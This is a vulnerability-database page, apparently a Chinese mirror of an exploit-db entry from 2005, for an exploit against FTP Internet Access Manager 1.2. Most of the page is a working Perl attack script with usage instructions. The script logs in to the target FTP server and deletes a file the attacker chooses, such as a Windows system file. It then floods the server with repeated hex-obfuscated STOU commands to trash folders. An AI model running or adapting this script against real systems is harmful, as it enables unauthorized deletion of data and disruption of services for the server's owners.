FTP Internet Access Manager 1.2 - Command Execution

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1055373 漏洞类型
发布时间 2005-09-07 更新时间 2005-09-07
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/1201
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!usr/bin/perl
#
#   FTP Internet Access Manager Command Exploit
# ----------------------------------------------
#      Infam0us Gr0up - Securiti Research
#
# Info: infamous.2hell.com
# Vendor URL: www.softfolder.com/internet_access_manager.html
# 

use IO::Socket;

if (@ARGV != 4) 
{ 
print "\n FTP Internet Access Manager Command Exploit\n";
print "---------------------------------------------\n\n";
print "[!] usage: perl $0 [host] [user] [pass] [*file]\n";
print "[?] exam: perl $0 localhost admin 123 C:\\WINNT\\system32\\command.exe\n";
print "*Only at dir Internet Access Manager was installed that user can delete\nany files type(e.g C:\\)\n\n"; 
exit ();
} 

$adr = $ARGV[0];
$user = $ARGV[1];
$pass = $ARGV[2];
$flz = $ARGV[3];

print "\n[+] Connect to $adr..\n";
$remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>21, Reuse=>1) or die "Error: can't connect to $adr:21\n";

$chr1 = "\x55\x53\x45\x52";
$chr2 = "\x50\x41\x53\x53";

$dll = "\x44\x45\x4c\x45";
$tou = "\x70\x6f\x72\x74";
$bel = "\x32\x31";

$cowflaw = $tou.$bel;

$tmp = "\x53\x54\x4f\x55";
$chop = "\x4f\x56\x45\x52";

print "[+] Connected\n";
$remote->autoflush(1);
print "[+] FTP Server ..ready\n";

print $remote "$chr1 $user\n" and print "[+] Send -> USER $user...\n" or die
"[-] Error: can't send user\n";
sleep(1);
print $remote "$chr2 $pass\n" and print "[+] Send -> PASS $pass...\n" or die
"[-] Error: can't send pass\n";
sleep(2);
print "[+] User admin logged in\n";
print "[+] Press[enter] to DELETE $flz\n";
$bla= ;
print $remote "$dll /$flz\n";
sleep(2);
print "[+] Success\n";
sleep(1);
print "[+] Sending trash mount..\n";
sleep(1);
print $remote "$cowflaw\n";
print $remote "$tmp\n";
print "[+] Trashing folder[1]..\n";
print $remote "$tmp\n";
print "[+] Trashing folder[2]..\n";
print $remote "$tmp\n";
print "[+] Trashing folder[3]..\n";
print $remote "$tmp\n";
print "[+] Trashing folder[4]..\n";
print $remote "$tmp\n";
print "[+] Trashing folder[5]..\n";
print $remote "$tmp\n";
print "[+] Trashing folder[6]..\n";
print $remote "$tmp\n";
print "[+] Trashing folder[7]..\n";
print $remote "$tmp\n";
print "[+] Trashing folder[8]..\n";
print $remote "$tmp\n";
print "[+] Trashing folder[9]..\n";
print $remote "$tmp\n";
print "[+] Trashing folder[10]..\n";
print $remote "$tmp\n";
print "[+] Trashing folder[11]..\n";
print $remote "$tmp\n";
print "[+] Trashing folder[12]..\n";
print $remote "$tmp\n";
print "[+] Trashing folder[13]..\n";
print $remote "$tmp\n";
print "[+] Trashing folder[14]..\n";
print $remote "$tmp\n";
print "[+] Trashing folder[15]..\n";
print $remote "$tmp\n";
sleep(2);
print "[+] DONE\n\n";
print $remote "$chop\n";  
print "W00t.FTP Flawned!\n";
print "..press any key to exit\n";
$bla= ;
close $remote;

# milw0rm.com [2005-09-07]